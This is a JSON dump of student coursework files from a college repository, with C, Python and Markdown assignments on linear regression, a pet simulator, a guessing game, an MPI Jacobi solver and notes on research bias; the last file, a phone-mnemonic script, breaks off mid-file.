[ { "alpha_fraction": 0.6321269273757935, "alphanum_fraction": 0.6479920744895935, "avg_line_length": 22.183908462524414, "blob_id": "59f5f0a59c8944d62792c306d3014aa60dc4a0c2", "content_id": "10220412b40f105818b24fcb32b2326cef79d9d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 257, "num_lines": 87, "path": "/MAT 433 - Numberical Analysis/HW_1.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Algorithm\nAn algorithm is a set of steps that can be replicated to have an action occur. For example, an algorithm to add two numbers might take the one's place add them then add the tens and add any carries that might occur.\n\n# Flowchart\nA visual representation of an algorithm with set symbols denoting input, procedures, conditionals, and start and ends to the algorithms. Typically a oval is the start and end, conditionals are diamonds, input is a parallelogram and procedure is a rectangle.\n\n# Psuedocode\nA human friendly representation of a step of steps (algorithm) that can be followed to write actual code. Psuedocode is should be readable by humans almost as easily as prose.\n\n# 2 Addition\n\n```js \nFunction add (x, y):\ninput [x_n, y_n]\nx_length = len(x)\ny_length = len(y)\nloop_length = 0\n\nif x_length < y_length:\n loop_length = y_length\n diffrence = y_length - x_length\n for diffrence; diffrence -= 1:\n x = append(0, x)\nelse:\n loop_length = x_length\n diffrence = x_length - y_length\n for diffrence; diffrence -= 1:\n x = append(0, x)\n\ncounter = loop_length\nresult = list(loop_length)\nfor loop_length; loop_length -=1 and loop_length > 1:\n ones = x_counter + y_counter\n if ones >= 10:\n x_(counter-1) += 1\n result_counter = ones\n counter -= 1\n\nleading_digits = x_0 + y_0\nresult_0 = leading_digits\noutput result\n```\n\n\n# 3 Multiplication\n\n```js\nFunction multiply(x,y):\ninput(x_n, y_n)\nresult = 0\nif x_n < y_n:\n for x_n; x_n -=1:\n result += add(result, y_n)\nelse:\n for y_n; y_n -=1:\n result += add(result, x_n)\noutput result\n```\n\n#4 Primeize\n```\nFunction prime(x):\ninput(x)\nif x == 1 or x == 2:\n print(x)\n end\ncounter = x-1\nresult = \"\"\nwhile counter > 0:\n if x%2 == 0:\n result += x\n x = x/2\n else:\n while x % counter != 0:\n counter -= 1\n if counter == 1:\n counter = -1 \n break\n else:\n if x/counter < counter:\n x = counter\n result += x/counter\n else:\n x = x/counter\n result += counter\nprint result\n```\n" }, { "alpha_fraction": 0.5928692817687988, "alphanum_fraction": 0.6010186672210693, "avg_line_length": 22.94308853149414, "blob_id": "386673b4b89e856401afa8b9b982521d22c654c6", "content_id": "c9d92462fa73a2bdb149106b089e5fb504118fe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2945, "license_type": "no_license", "max_line_length": 122, "num_lines": 123, "path": "/CSC 386 - Embedded Systems/structs-two/linear-regression.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <math.h>\n#include <stdlib.h>\n\n#define NUM_POINTS 15\n\n\ntypedef struct Point {\n int x;\n int y;\n} Point;\n\nvoid show_points (Point *points) {\n int ndx;\n for (ndx = 0 ; ndx < NUM_POINTS ; ndx++) {\n printf (\"[%d] x: %d, y: %d\\n\", ndx, points[ndx].x, points[ndx].y);\n }\n}\n\nvoid read_points (Point *points, char* fname) {\n FILE *pointsFile;\n \n int ndx;\n \n pointsFile = fopen(fname, 
\"r\");\n \n // We only read NUM_POINTS points from the file.\n for (ndx = 0 ; ndx < NUM_POINTS; ndx++) {\n Point *p = (Point *)malloc(sizeof(Point));\n int x, y;\n \n fscanf(pointsFile, \"%d,%d\", &x, &y);\n p->x = x;\n p->y = y;\n points[ndx] = *p;\n \n }\n \n fclose(pointsFile);\n \n}\n\nfloat calculate_beta (Point *points) {\n\n int Sxy = 0;\n int Sy = 0;\n int Sx = 0;\n float Sxx = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n printf(\"%d\", points);\n Sxy += points[counter].x * points[counter].y;\n Sy += points[counter].y;\n Sx += points[counter].x;\n Sxx += points[counter].x * points[counter].x;\n } \n // Solve for beta\n float beta = (NUM_POINTS*Sxy - Sx*Sy)/(NUM_POINTS*Sxx-pow(Sx,2));\n return beta;\n}\n\nfloat calculate_alpha (Point *points) {\n \n float beta = calculate_beta(points);\n int Sy = 0;\n int Sx = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n Sy += points[counter].y;\n Sx += points[counter].x;\n }\n // Solve for alpha\n float alpha = (Sy/NUM_POINTS) - (Sx*beta)/(NUM_POINTS);\n return alpha;\n}\n\n\nfloat calculate_R (Point *points) {\n int Sxy = 0;\n int Sy = 0;\n int Sx = 0;\n float Sxx = 0;\n int Syy = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n Sxy += points[counter].x * points[counter].y;\n Sy += points[counter].y;\n Sx += points[counter].x;\n Sxx += points[counter].x * points[counter].x;\n Syy += points[counter].x * points[counter].y;\n }\n // Solve for r\n float r = ( (NUM_POINTS * Sxy) - (Sx*Sy) )/ (sqrt ( (NUM_POINTS*Sxx - pow(Sx,2) ) * ( NUM_POINTS*Syy - pow(Sy, 2)) ));\n return r;\n\n}\n\nint main (int argc, char* argv[]) {\n Point *points = (Point *)malloc(sizeof(Point) * NUM_POINTS);\n \n\t// Make sure we have one argument---the name of the datafile---\n\t// on the command line.\n if (argc > 1) { \n // Read into the points array.\n read_points (points, argv[1]);\n // Print them, to make sure you have an array of populated\n\t\t// Point structures. 
If this code works, it means you can implement\n        // your algorithm.\n        show_points(points);\n\n        // These functions need to be completed by you.\n        float alpha = calculate_alpha(points);\n        float beta = calculate_beta(points);\n        float R = calculate_R(points);\n\n        // Print useful information to the user here.\n        printf(\"alpha (intercept): %f\\\n\", alpha);\n        printf(\"beta (slope): %f\\\n\", beta);\n        printf(\"R (correlation): %f\\\n\", R);\n    }\n\n    return 0;\n}\n" }, { "alpha_fraction": 0.4543132185935974, "alphanum_fraction": 0.4633523225784302, "avg_line_length": 40.040321350097656, "blob_id": "9ddd6f2784be51d68db7971f58ab6aace8f1dca5", "content_id": "647013dd34e5bef32a74709147688fb788b1059a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5089, "license_type": "no_license", "max_line_length": 106, "num_lines": 124, "path": "/CSC 236 - Software Design/PetSimulator/simulator.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from pet import Pet\nfrom food import Food\nfrom owner import Owner\nimport random\n\nclass Simulator:\n    \"\"\" Simulates owners and their pets \"\"\"\n    name_list = [\"John\", \"Jack\", \"Seth\", \"Pablo\",\n                 \"RicK\", \"Morty\", \"Sher\",\"Pure Evil\",\n                 \"Migel\", \"Reberto\",\"Alondra\", \"Titan\"]\n    def __init__(self):\n        \"\"\" Creates an instance of the class \"\"\"\n        self.owners = list()\n        self.add_owners()\n\n    def start_simulation(self, years):\n        \"\"\" Starts up the simulator \"\"\"\n        for day in range(years * 365):\n            # See what the owner did on that day\n            for owner in self.owners:\n                print(\"Day: \" + str(day) + \" for \"+ owner.get_name() +\": \")\n\n                # Pick a random action for the user\n                action = random.randint(0, 9)\n                name = self.name_list[day % len(self.name_list)]\n                pet_count = len( owner.get_pets() )\n\n                # Determine what that action does\n                if action == 0:\n                    # Add a pet\n                    pet = Pet(name)\n                    owner.add_pet(pet)\n                    print (owner.get_name() + \" just added a new pet \" + name)\n                elif action == 1 and pet_count > 0:\n                    # Feed a pet; Food expects a single name, so pick one at random.\n                    food_name = [\"Apple Pie\", \"Cake\", \"Watermelon\", \"Takeout\", \"Cereal\", \"Cheese\", \"Water\"]\n                    meal = Food(random.choice(food_name))\n                    pet = owner.get_random_pet()\n                    owner.feed(pet, meal)\n                elif action == 2 and pet_count > 0:\n\n                    # play with a pet\n                    pet = owner.get_random_pet()\n                    owner.play(pet)\n                elif action == 3 and pet_count > 0:\n\n                    # release a pet\n                    pet = owner.get_random_pet()\n                    owner.remove_pet(pet)\n                    print (owner.get_name() + \" has chosen to release \" + pet.get_name())\n                elif action == 4 and pet_count > 0:\n\n                    # set a pet's name\n                    pet = owner.get_random_pet()\n                    old_name = pet.get_name()\n                    pet.set_name(name)\n                    print (owner.get_name() + \" has changed \" + old_name + \"'s name to \" + pet.get_name())\n                elif action == 5 and pet_count > 0:\n\n                    # adjust a pet's hunger\n                    pet = owner.get_random_pet()\n                    hunger_change = random.randint(-70, 20)\n                    pet.adjust_hunger(hunger_change)\n                    self.check_hunger(owner, pet)\n                elif action == 6 and pet_count > 0:\n\n                    # improve a pet's happiness\n                    pet = owner.get_random_pet()\n                    happiness_change = random.randint(-70, 2)\n                    pet.adjust_happines(happiness_change)\n                    self.check_happiness(owner, pet)\n                elif action == 7 and pet_count > 0:\n\n                    # set a pet's happiness\n                    pet = owner.get_random_pet()\n                    happiness = random.randint(0, 100)\n                    pet.set_happiness(happiness)\n                    self.check_happiness(owner, pet)\n                elif action == 8 and pet_count > 0:\n\n                    # Set a pet's hunger\n                    pet = owner.get_random_pet()\n                    hunger = random.randint(0, 100)\n                    pet.set_hunger(hunger)\n                    self.check_hunger(owner, pet)\n                else:\n                    # The owner did nothing\n                    print (\"Left his pets 
alone\")\n \n\n def check_hunger(self, owner, pet):\n \"\"\" Make sure the pet is not starving \"\"\"\n hunger = pet.get_hunger()\n if hunger < 0:\n owner.remove_pet(pet)\n print (pet.get_name() + \" has left \" + owner.get_name() + \" due to hunger\")\n elif hunger < 70:\n print (owner.get_name() + \"'s pet \"+ pet.get_name() + \" is not hungry.\")\n else:\n print (owner.get_name() + \"'s pet \" +pet.get_name() + \" is stuffed \")\n\n def check_happiness(self, owner, pet):\n \"\"\" Make sure the pet is not starving \"\"\"\n hunger = pet.get_happiness()\n if hunger < 0:\n owner.remove_pet(pet)\n print (pet.get_name() + \" has left \" + owner.get_name() + \" due to saddness\")\n elif hunger < 70:\n print (owner.get_name() + \"'s pet \" + pet.get_name() + \" is happy. \")\n else:\n print (owner.get_name() + \"'s pet \" + pet.get_name() + \" is excited. \")\n\n def get_simulation_stats(self):\n \"\"\" Gets the simulator results \"\"\"\n return stats\n\n def add_owners(self):\n \"\"\" Adds owners to the simulation \"\"\"\n owner_count = random.randint(5,14)\n for i in range(owner_count):\n name = self.name_list[i % len(self.name_list)]\n owner = Owner(name)\n print(\"Added \" + name + \" as an owner\")\n self.owners.append(owner)\n" }, { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6056337952613831, "avg_line_length": 10.833333015441895, "blob_id": "6291e7606c823645e08d1f4d5ac8919d6f2c962f", "content_id": "e8d7a59d8b8bbba4dba8de184fc33820c517bf93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 71, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/CSC 386 - Embedded Systems/structs-two/Makefile", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "all:\n\tgcc -o lrm linear-regression.c -lm\n\t\nclean:\n\trm -f lr\n\trm -f *.o\n" }, { "alpha_fraction": 0.5703364014625549, "alphanum_fraction": 0.574923574924469, "avg_line_length": 25.1200008392334, "blob_id": "69478441141d9fad10d8f506219084c26c5ad561", "content_id": "0344a09ea6dc7299b73e26322288d0e6463e9094", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 60, "num_lines": 25, "path": "/CSC 236 - Software Design/PetSimulator/food.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import random\nclass Food():\n \"\"\" class to keep track of the diffrent types of food\"\"\"\n def __init__(self, name):\n self.name = name\n\n # Sets how much hunger a food takes away\n self.fillness = random.randint(1,30)\n\n def get_name(self):\n \"\"\" Returns the food's name\"\"\"\n return self.name\n\n def set_name(self, name):\n \"\"\"Sets the food's name \"\"\"\n self.name = name\n\n def get_fillness(self):\n \"\"\" Gets how much a food fills up a pet\"\"\"\n\n return self.fillness\n\n def set_fillness(self, fillness):\n \"\"\" Sets how much a food fills up a pet\"\"\"\n self.fillness = fillness\n\n" }, { "alpha_fraction": 0.5873192548751831, "alphanum_fraction": 0.5876900553703308, "avg_line_length": 31.493976593017578, "blob_id": "b56b953bc5140f57f60cf4317eb6f4b7ccac9d03", "content_id": "12720e800cdcbdd0a51b9d060c17e8bc9ebc4711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2697, "license_type": "no_license", "max_line_length": 99, "num_lines": 83, "path": "/CSC 236 - Software Design/AnimalGuessingGame/guessing.py", 
"repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\n\n Created by Jesson Soto\n A guessing game that will learn based on questions provided by the user.\n\n\n\"\"\"\n\nimport json\n\ndef main():\n \"\"\"\n Opens a json file and imports it's logic to play the guessing game,\n Pre: None\n Post: A guess is provided and the program ends or starts over.\n \"\"\"\n\n # Aquire the logic file's path.\n file_path = raw_input(\"Where is the name of the logic file: \")\n logic_file = open(filename, \"rw\")\n\n # Create a json from the file.\n logic_tree = json.load(logic_file)\n\n # Play the guessing game.\n play_again = guess(logic_tree)\n\n # Repeat the game for as long as the user wants.\n while (play_again):\n play_again = guess(logic_tree)\n else:\n # On a completed game write out the new logic as a json onto some file.\n logic_file.close()\n logic_file = open(file_path, \"w\")\n\n # Make it look nice.\n logic_file.write(json.dumps(logic_tree, sort_keys=True, indent=4, separators = (',',': ')))\n logic_file.close()\n\ndef guess(head):\n \"\"\"\n Guesses the animal that the user is thinking of or enables them to add a question\n so that it could find it next time.\n Pre: Head - The top of the tree, or the start of the questions\n Post: A True or False indicating if the game should be repeated.\n \"\"\"\n\n # Takes a guess. This occures once the leaf nodes are reached. - Base\n if \"Guess\" in head:\n answer = raw_input(\"Is it a \" + head[\"Guess\"] + \": \")\n\n # On incorrect answer allow the user to add a question to later be used.\n if 'n' in answer.lower():\n\n # Get the approperate question and answer.\n correct_answer = raw_input(\"What was the animal: \")\n better_question = raw_input(\"What is one question that would identify the animal: \")\n incorrect_answer = head[\"Guess\"]\n\n # Insert the question with the guesses into the structure\n head[\"Question\"] = better_question\n head[\"Yes\"] = {\"Guess\": correct_answer}\n head[\"No\"] = {\"Guess\": incorrect_answer}\n\n # Remove the old leaf.\n del(head[\"Guess\"])\n\n # Prompt the player to play again\n answer = raw_input(\"Would you like to play again: \")\n if 'y' in answer.lower():\n return True\n else:\n return False\n else:\n # Ask the player a question to narrow down the choices.\n answer = raw_input(head[\"Question\"] + \": \")\n if 'y' in answer.lower():\n return guess(head[\"Yes\"]) # Recursive Case\n else:\n return guess(head[\"No\"]) # Recursive Case\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5037581324577332, "alphanum_fraction": 0.5185343623161316, "avg_line_length": 29.017948150634766, "blob_id": "87ee63698f970628a06d33878e6318126aabc9e4", "content_id": "6762f49c0027f42bcf57afadd180def3ea128218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11708, "license_type": "no_license", "max_line_length": 126, "num_lines": 390, "path": "/CSC 486 - Parallel and Distributed Systems/sotoventuraj_dist.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nJesson Soto\nJacobi\n\n\"\"\"\nfrom mpi4py import MPI\nimport os\n\ndef empty_matrix(source, headers):\n \"\"\"\n Generates an empty matrix based on source headers,\n size with the boundry rows already added.\n \"\"\"\n # Gererate empty list\n empty = list()\n\n # Added the top boundry row\n empty.append(source[0])\n\n # Determine row and column size\n rows = headers[0] - 1\n columns = headers[1] - 1\n\n # Populate the 
empty matrix\n for y in range(1, rows):\n temp_row = list()\n\n # Add the boundry left column\n temp_row.append(source[y][0])\n for x in range(1, columns):\n temp_row.append(None)\n\n # Add the boundry right column\n temp_row.append(source[y][-1])\n empty.append(temp_row)\n\n # Add bottom row\n empty.append(source[-1])\n return empty\n\ndef jacobi (source):\n \"\"\" Takes the values from the source and produces a new\n list of values that have had the Jacobi algorithms preformed\n on them.\n\n Args:\n source - The source list (2D), with only the data points.\n headers - A tuple of the x and y values\n\n Returns:\n A list containing the new values, the values are a mix of strings and ints.\n \"\"\"\n\n # Find the bounds\n max_rows = len(source)\n max_columns = len(source[0])\n if(max_rows == 2):\n return source\n result = empty_matrix(source, (max_rows, max_columns))\n max_rows -= 1\n max_columns -= 1\n # Create the first row.\n\n for y in range(1, max_rows):\n # Store the current jacobi values in a temp row\n for x in range(1, max_columns):\n result[y][x] = 0.25 * (long(source[y-1][x]) + long(source[y+1][x]) + long(source[y][x-1]) + long(source[y][x+1]))\n return result\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n # Used to house the 1D variant of the array\n jacobi_data_flat = list()\n # Used to house x and y\n headers = None\n\n # Open the file\n with open(\"test.in\", \"r\") as file:\n # Clean the data for later processing\n raw_data = file.read()\n raw_data = raw_data.replace(\"\\n\", \" \")\n raw_data = raw_data.replace(\"\\r\", \" \")\n raw_data = raw_data.replace(\" \", \" \")\n jacobi_data_flat = raw_data.split(\" \")\n\n # Strip out the headers\n headers = [int(jacobi_data_flat[0]), int(jacobi_data_flat[1])]\n og_header = (int(jacobi_data_flat[0]), int(jacobi_data_flat[1]))\n jacobi_data_flat = jacobi_data_flat[2:-1]\n # Conver the 1D list to a 2D list\n jacobi_data = roll_matrix(jacobi_data_flat, headers)\n\n # Preform a distributed Jacobi\n if size != 1:\n # Get the start and end headers for rank\n start, end = distribute(headers)\n headers[0] = abs(start-end)\n\n # Generate the first matrix along with an empty one\n results_1 = jacobi_data[start:end]\n data_size = len(jacobi_data)\n results_2 = empty_matrix(jacobi_data[start:end], headers)\n\n # Use tags to denote the top and bottom of the rows\n swap = True\n TOP_TAG = 10000\n BOTTOM_TAG = 000\n RECV_TAG = 30000\n\n # Preform 100 iterations of jacobi\n for i in range(100):\n # Specify the top and bottom rows\n top = None\n bottom = None\n\n # Determine the matrix to use based on swap\n if swap:\n results_2 = jacobi(results_1)\n top = results_2 [1]\n bottom = results_2 [-2]\n else:\n results_1 = jacobi(results_2)\n top = results_1[1]\n bottom = results_1[-2]\n\n # Preform send based on rank number and chunk the data\n if rank == 0:\n chunk_send(bottom, 1, TOP_TAG)\n bottom = chunk_recv(1, BOTTOM_TAG, data_size)\n elif rank == (size - 1):\n chunk_send(top, (rank-1), BOTTOM_TAG)\n top = chunk_recv((rank-1), TOP_TAG, data_size)\n else:\n chunk_send(top, (rank-1), BOTTOM_TAG)\n chunk_send(bottom, (rank+1), TOP_TAG)\n top = chunk_recv((rank-1), TOP_TAG, data_size)\n bottom = chunk_recv((rank+1), BOTTOM_TAG, data_size)\n\n # Update the matrix rows with the new boundries\n if swap:\n if rank != 0:\n results_2[0] = top\n if rank != (size - 1):\n results_2[-1] = bottom\n else:\n if rank != 0:\n results_1[0] = top\n if rank != (size - 1):\n results_1[-1] = bottom\n swap = not swap\n 
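# Log loop progress so long runs show activity.\n            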
print(i)\n\n        # Write out the data and concatenate the per-rank pieces\n        if rank != 0 and rank != (size - 1):\n            if swap:\n                results_2 = results_2[1:-1]\n                data = results_2\n            else:\n                results_1 = results_1[1:-1]\n                data = results_1\n\n            # Dump out this rank's rows\n            with open(\"Temp\" + str(rank), \"w\") as temp:\n                for row in data:\n                    for index in row:\n                        temp.write(str(index) + \" \")\n                    temp.write(\"\\\n\")\n            comm.send(True, dest=0)\n\n        elif rank == (size - 1):\n            if swap:\n                results_2 = results_2[1:]\n                data = results_2\n            else:\n                results_1 = results_1[1:]\n                data = results_1\n            # Dump out this rank's rows\n            with open(\"Temp\" + str(rank), \"w\") as temp:\n                for row in data:\n                    for index in row:\n                        temp.write(str(index) + \" \")\n                    temp.write(\"\\\n\")\n            comm.send(True, dest=0)\n        else:\n            # Concatenate the data\n            data = None\n            if swap:\n                results_2 = results_2[0:-1]\n                data = results_2\n            else:\n                results_1 = results_1[0:-1]\n                data = results_1\n\n            with open(\"Temp\" + str(rank), \"w\") as temp:\n                temp.write(str(og_header[0]) + \" \")\n                temp.write(str(og_header[1]) + \"\\\n\")\n                for row in data:\n                    for index in row:\n                        temp.write(str(index) + \" \")\n                    temp.write(\"\\\n\")\n\n            # Wait until all the other nodes are done\n            for i in range(1, size):\n                print ( comm.recv(source = i))\n\n            # Remove the old data file\n            os.system(\"rm data.out\")\n\n            # Unify all the data files\n            for i in range(size):\n                os.system(\"cat Temp\" + str(i)+\" >> data.out\")\n\n            # clear old files\n            os.system(\"rm -f Temp*\")\n\n    return\n\ndef chunk_send(source, dest, tag, chunk_size=100):\n    \"\"\"\n    Takes the source data and breaks it into\n    chunks, to allow for larger data transfers.\n\n    source - The source data\n    dest - the destination\n    tag - the tag to send\n    chunk_size - chunk size\n    \"\"\"\n    comm = MPI.COMM_WORLD\n\n    # Determine if chunking is needed\n    if len(source) > chunk_size:\n\n        # Determine chunk sizes\n        send_count = len(source) // chunk_size\n        send_remainder = len(source) % chunk_size\n\n        # Send each chunk with a sequential tag value\n        for index in range(send_count):\n            start = chunk_size * index\n            end = chunk_size * (index+1)\n            comm.send(source[start:end], dest=dest, tag=(tag+index))\n\n        # Send any remaining partial chunk. This block must live inside the\n        # chunking branch: send_count and send_remainder are only defined here.\n        if send_remainder:\n            start = len(source) - send_remainder\n            comm.send(source[start:], dest=dest, tag=(tag+send_count))\n    else:\n        # No chunking needed\n        comm.send(source, dest=dest, tag=tag)\n\ndef chunk_recv(source, tag, data_size, chunk_size=100):\n\n    \"\"\"\n    Receives chunked data and unifies it\n    to allow for larger data transfers.\n\n    source - The source data\n    tag - the tag to send\n    chunk_size - chunk size\n    data_size - the size of the expected data\n    \"\"\"\n    comm = MPI.COMM_WORLD\n    data = list()\n\n    # Determine if the data was chunked\n    if data_size > chunk_size:\n\n        # Determine how many chunks are to be expected\n        recv_count = data_size // chunk_size\n        recv_remainder = data_size % chunk_size\n\n        # Receive all the chunks and unify them in order\n        for index in range(recv_count):\n            data += comm.recv(source=source, tag=(tag+index))\n\n        # Receive any remaining partial chunk (recv_count and recv_remainder\n        # are only defined in this branch).\n        if recv_remainder:\n            data += comm.recv(source=source, tag=(tag+recv_count))\n    else:\n        # No chunking needed\n        data = comm.recv(source=source, tag=tag)\n    return data\n\ndef distribute(headers):\n\n    \"\"\"\n    Takes the headers and returns\n    a tuple defining the range of indices that\n    each node should operate on\n    headers - the headers of the file\n    \"\"\"\n\n    # Establish variables\n    comm = MPI.COMM_WORLD\n    rank = comm.Get_rank()\n    size = comm.Get_size()\n    file_size = 
def distribute(headers):\n    \"\"\"\n    Takes the headers and returns\n    a tuple defining the range of row indices that\n    each node should operate on.\n\n    headers - the headers of the file\n    \"\"\"\n\n    # Establish variables\n    comm = MPI.COMM_WORLD\n    rank = comm.Get_rank()\n    size = comm.Get_size()\n    file_size = headers[1]\n\n    start = 0\n    end = 0\n\n    # Determine the amount given to each node\n    remainder = file_size % size\n    spacing = file_size // size\n\n    # Do nothing special if there is no remainder\n    if remainder == 0:\n        start = spacing*rank\n        end = spacing*(rank+1)-1\n\n    # Split based on the remainder to make sure no node has more than 1 or 2 extra rows\n    elif rank < remainder:\n        if rank == 0:\n            start = spacing*rank\n            end = spacing*(rank+1) + 2\n        else:\n            start = spacing*rank + rank - 1\n            end = spacing*(rank+1) + rank + 2\n\n    # There is a transition period between the remainders; take this into account\n    elif rank == remainder:\n        start = spacing*rank + remainder - 1\n        end = spacing*(rank+1) + remainder + 1\n\n    # The rest act as if no remainder occurred, except for the offset\n    else:\n        start = spacing*rank + remainder - 1\n        end = spacing*(rank+1) + remainder + 1\n\n    print(start, end, rank)\n    return start, end\n\ndef write_data(data, headers):\n    \"\"\" Writes out the Jacobi data.\n\n    Args:\n        data - A 2D list containing the data\n        headers - The size of the list\n\n    Returns:\n        None; creates the output file as a side effect.\n    \"\"\"\n\n    # Open a file\n    with open(\"1024x1024.jacobi.out\", \"w\") as file:\n        # Write out the headers\n        file.write(str(headers[0]) + \" \")\n        file.write(str(headers[1]) + \"\\n\")\n\n        # Write out each row on its own line\n        for row in data:\n            for entry in row:\n                file.write(str(entry) + \" \")\n            file.write(\"\\n\")\n\ndef roll_matrix(flat, headers):\n    \"\"\" Takes a 1D list and makes it 2D\n\n    Args:\n        flat - The 1D list\n        headers - Tuple of x and y\n\n    Returns:\n        list of 2D source values\n    \"\"\"\n\n    # Empty list\n    jacobi_data = list()\n\n    # Strip out a row's worth of data and add it to the list\n    for index in range(headers[1]):\n        start = index * headers[1]\n        end = ((index + 1) * headers[1])\n        row_data = flat[start:end]\n        for i in range(len(row_data)):\n            row_data[i] = int(row_data[i])\n        jacobi_data.append(row_data)\n    return jacobi_data\n\nmain()\n\n" }, { "alpha_fraction": 0.7844982147216797, "alphanum_fraction": 0.7907705903053284, "avg_line_length": 92, "blob_id": "4a31de2c8fea3d53f12650a2214d6d525f348193", "content_id": "2bf5abc13a68ebcfce2b83624934a70b1b08bd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2232, "license_type": "no_license", "max_line_length": 220, "num_lines": 24, "path": "/GSTR 410 - Indigenous Peoples/bias.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Reading\n- When researching a group, we can place more emphasis on the acts of theirs that most resemble acts of our own. 
\n- Stereotypes are often taken into account when researching groups, leading to misguided information\n- When looking at groups, certain people's experiences can be preferred over others', resulting in a slanted view of the group\n- As an outsider, interacting with the group can cause a change in their behavior\n- As an insider, the assumption that the group behaves the way you were raised can cause more attention to be placed on similarities or differences.\n- The group being studied can be assumed to be a critical mass when it is actually many small groups\n- Appropriation of knowledge becomes an issue\n- Eurocentric views are seen as primary views while other views are relegated to secondary views.\n- The ethical space is an area where two cultures must be separated, but a small area exists for constructive talk about each of the cultures.\n- The ethical space is another way of saying cultural divide.\n# Inquiry\n- Not all biases are simple, in that we know that we have them. Some biases are implicit\n- These are formed from an early age and lead to judgment based on early childhood experiences.\n## https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2917255/\n- Overcoming bias needs to be intentional, and being aware of possible issues can help\n- Selecting certain people to interview can be handled by taking random samples\n- Knowing specifics about a group, say their health or race, can directly influence the types of questions that are being asked, or can cause a greater focus to be placed on the negative aspects.\n## https://hbr.org/2015/05/outsmart-your-own-biases\n- Relying heavily on system 1 senses (gut) can cause inaccurate results, as it is based on the biases that we have developed.\n- Techniques for overcoming this include evaluating the result multiple times and averaging your ideas.\n- Following your gut, but always looking back at the result. 
If it was something bad, then asking why was it bad, and keeping that in mind for next time.\n- Ask someone on the outside to help you make choices and see if you are being blinded by bias.\n- Think about the possible alternatives.\n" }, { "alpha_fraction": 0.5483920574188232, "alphanum_fraction": 0.5568751692771912, "avg_line_length": 31.580402374267578, "blob_id": "41d661cd23d3c2d979b546ee91ba9fdef7572854", "content_id": "f5b12300ec607781cd96d174d0c1ad212bb46ba1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12967, "license_type": "no_license", "max_line_length": 205, "num_lines": 398, "path": "/CSC 236 - Software Design/Phonenumbers/application.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated by: Jesson Soto Ventura\nFinds all the mnemonics formed by a set of numbers\nA14\n\"\"\"\nimport json\nfrom urllib2 import Request, urlopen, URLError\n\n\ndef recursivemnemonics(word):\n \"\"\"\n Returns the next iteration on a word provided.\n Pre:\n A string that will be incremented\n Post:\n An incremented string along with an indicator of whether the cycle has been complemeted or not\n \"\"\"\n\n # Check the length of the word.\n # A word of length 1 is our base\n if len(word) != 1:\n\n # Get strip the first letter off the word and call itself\n stripped_word = word[1:]\n stripped_letter = word[0]\n\n # Increment the stripped_word\n is_end_of_cycle, next_word= recursivemnemonics(stripped_word)\n\n # Decide what to return\n if is_end_of_cycle:\n # For end of cycles incremented the first letter as well\n # Then return\n is_end_of_cycle, next_letter = get_next_letter(stripped_letter)\n return (is_end_of_cycle, next_letter + next_word)\n else:\n # Return only the incremented with the same first letter\n word = stripped_letter + next_word\n return (is_end_of_cycle, word)\n else:\n return get_next_letter(word)\n\ndef listmnemonics( word):\n \"\"\" Creates a list of the mnemonics returned by recursivemnemonics\n pre: A valid word to start the cycle with.\n post: A list of all the mnemonics formed from that word\n \"\"\"\n\n sequences = list()\n\n # Get the next sequence after the gwen word.\n is_end_of_cycle, next_sequence = recursivemnemonics(word)\n\n # Store the the sequence that follows it.\n sequences.append(next_sequence)\n\n # Continue storing the next sequence until the basecase has reached the end of its cycle\n while not is_end_of_cycle:\n is_end_of_cycle, next_sequence = recursivemnemonics(next_sequence)\n sequences.append(next_sequence)\n return(sequences)\n\n\ndef get_next_letter(letter):\n \"\"\" Returns the next letter in the cycle\n Parameters:\n letter - The letter to be advanced\n Pre:\n A single letter\n Post:\n A tuple indicating if the cycle started over along with the\n next letter in the cycle\n \"\"\"\n\n cycle = {\"A\":(False, \"B\"),\n \"B\":(False, \"C\"),\n \"C\":(True, \"A\"),\n \"D\":(False, \"E\"),\n \"E\":(False, \"F\"),\n \"F\":(True, \"D\"),\n \"G\":(False, \"H\"),\n \"H\":(False, \"I\"),\n \"I\":(True, \"G\"),\n \"J\":(False, \"K\"),\n \"K\":(False, \"L\"),\n \"L\":(True, \"J\"),\n \"M\":(False, \"N\"),\n \"N\":(False, \"O\"),\n \"O\":(True, \"M\"),\n \"P\":(False, \"Q\"),\n \"Q\":(False, \"R\"),\n \"R\":(False, \"S\"),\n \"S\":(True, \"P\"),\n 